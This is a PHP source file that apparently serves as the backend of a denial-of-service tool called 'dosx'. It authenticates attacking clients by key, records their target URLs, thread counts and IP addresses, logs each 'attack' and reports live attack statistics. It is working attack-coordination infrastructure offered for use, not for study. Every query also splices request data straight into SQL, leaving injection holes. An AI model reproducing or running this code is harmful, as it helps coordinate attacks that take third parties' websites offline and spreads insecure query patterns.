<?php

require_once 'Database.Class.php';

class dosx {
    
    public static $thread_allowed = null;
    public static $private = null;

    public static function get(){
        $data = json_decode(file_get_contents('php://input'), true);
        if (dosx::verify_header() === true){
            if (isset($data['url'], $data['time'], $data['sys_name'], $data['sys_ip_local'], $data['sys_ip_public'], $data['date_time'], $data['thread'])){
                $lasturl = $data['url'];
                $time = $data['time'];
                $system_name = $data['sys_name'];
                $sys_ip_local = $data['sys_ip_local'];
                $sys_ip_public = $data['sys_ip_public'];
                $recent = $data['date_time'];
                $thread = $data['thread'];
                // echo json_encode(array("Thread".$thread,"Limited".dosx::$thread_allowed));
                if ($thread > dosx::$thread_allowed){
                    // 0 for more thread from the user
                    $result = Database::DbConnection()->query("UPDATE `dos` SET `last_url` = '$lasturl',`time` = '$time',`sys_name` = '$system_name', `sys_local_ip` = '$sys_ip_local', `sys_public_ip` = '$sys_ip_public',`last_try` = '$recent' WHERE `private_key` = '$private';");
                    if ($result){
                        // $attack_id = md5('Name');
                        // $ini_time = time();
                        // Database::DbConnection()->query("INSERT INTO `fun_dos` (`authorized`, `attack_id`, `total_thread`, `url`, `time_started`, `time_ended`, `total_users`, `live` VALUES ('', '$attack_id', '$thread', '$lasturl', '$ini_time', 'None', '1', '1')");
                        echo json_encode(array('thread_allowed' => dosx::$thread_allowed, "Response" => 0, "Message" => "admin cancelled the thread"));
                    } else{
                        echo json_encode(array("Message" => "Cannot update data"));
                    }
                } else {
                    // 7 for access granted
                    $private = dosx::$private;
                    $result = Database::DbConnection()->query("SELECT `name` FROM `dos` WHERE  `private_key` = '$private';;");
                    $data = $result->fetch_assoc();
                    
                    if ($data != null){
                        $name = $data['name'];
                        $attack_id = md5($name.rand(111,222222));
                        $ini_time = time();
                        Database::DbConnection()->query("INSERT INTO `fun_dos` (`authorized`, `attack_id`, `total_thread`, `url`, `time_started`, `time_ended`, `total_users`, `live`) VALUES ('$name', '$attack_id', '$thread', '$lasturl', '$ini_time', 'None', '1', '1')");
                        $result = Database::DbConnection()->query("UPDATE `dos` SET `last_url` = '$lasturl',`time` = '$time',`sys_name` = '$system_name', `sys_local_ip` = '$sys_ip_local', `sys_public_ip` = '$sys_ip_public',`last_try` = '$recent', `last_attack` = '$recent' WHERE `private_key` = '$private';");
                        if ($result){
                            echo json_encode(array('thread_allowed' => dosx::$thread_allowed,"Response" => 7, "Message" => "Access Granted", "version" => "0.0.2"));
                        } else{
                            echo json_encode(array("Message" => "Cannot update data"));
                        }
                    }
                }
                

            } else {
                echo json_encode(array("Message" => "Data not set"));
            }
        } else{
            echo json_encode(array("Response" => 807, "Message" => "Private key not set"));
        }
        
    }


    private static function verify_header(){
        try{
            $a = getallheaders();
            if (isset($a['Authorization'])){
                dosx::$private = str_replace("Bearer ", "", $a['Authorization']);
                $private = dosx::$private;
                $result = Database::DbConnection()->query("SELECT `access`, 'thread_allowed' FROM `dos` WHERE `private_key` = '$private';");
                $co_ = $result->fetch_assoc();
                if ($co_ !== null){
                    dosx::$thread_allowed = $co_['thread_allowed'];
                    return true;
                } else {
                    echo json_encode("Private key invalid! or Access denied");
                }  
            } else {
                echo json_encode("Private Key not set!");
            }
        } catch (Exception $ee){
            print($ee->getMessage());
        }
        
    }

    
    public static function live_stats(){
        if (dosx::verify_header() === true){
            try{
                $result = Database::DbConnection()->query("SELECT `id`, `authorized`, `attack_id`, `total_thread`, `url`, `time_started`, `time_ended`, `total_users` FROM `fun_dos`;");

                $data = ["attacks" => []];

                while ($cha_x = $result->fetch_assoc()) {
                    
                    $data["attacks"][] = [
                        "id" => $cha_x["id"],
                        "attack_id" => $cha_x['attack_id'],
                        "name" => $cha_x["authorized"],
                        "total_threads" => $cha_x["total_thread"],
                        "url" => $cha_x["url"],
                        "started_time" => $cha_x["time_started"],
                        "ended_time" => $cha_x["time_ended"]
                    ];
                }
                
                header('Content-Type: application/json');
                echo json_encode($data);
                
            } catch(Exception $e){
                echo json_encode($e->getMessage());
            }  
        }
        
    }


    public static function set_stats(){
        if (dosx::verify_header() === true){
            try {
                $data_x = json_decode(file_get_contents('php://input'), true);
                if ($token = $data_x['attack_id']){
                    $result = Database::DbConnection()->query("SELECT `total_thread` FROM `fun_dos` WHERE  `attack_id` = '$token';;");
                    $data = $result->fetch_assoc();
        
                    if ((isset($data)) && (!is_null($data))){
                        $thread = $data_x['thread'] + $data['total_thread'];
                        if (Database::DbConnection()->query("UPDATE `fun_dos` SET `total_thread` = '$thread' WHERE `attack_id` = '$token';")){
                            echo json_encode(1);
                        } else {
                            echo json_encode(array("Message" => "Something goes wrong [Server Side]!"));
                        }
                    } else {
                        echo json_encode("Something goes wrong here! Check input field");
                    }
                } else {
                    echo json_encode("Attack ID not exist or valid!!");
                }
                

            } catch (Exception $err){
                echo json_encode($err->getMessage());
            }
        }
    }
}


if ($_GET['dos'] == "start"){
    dosx::get();
} elseif ($_GET['live'] == "get"){
    dosx::live_stats();
} elseif  ($_GET['live'] == "set") {
    dosx::set_stats();
}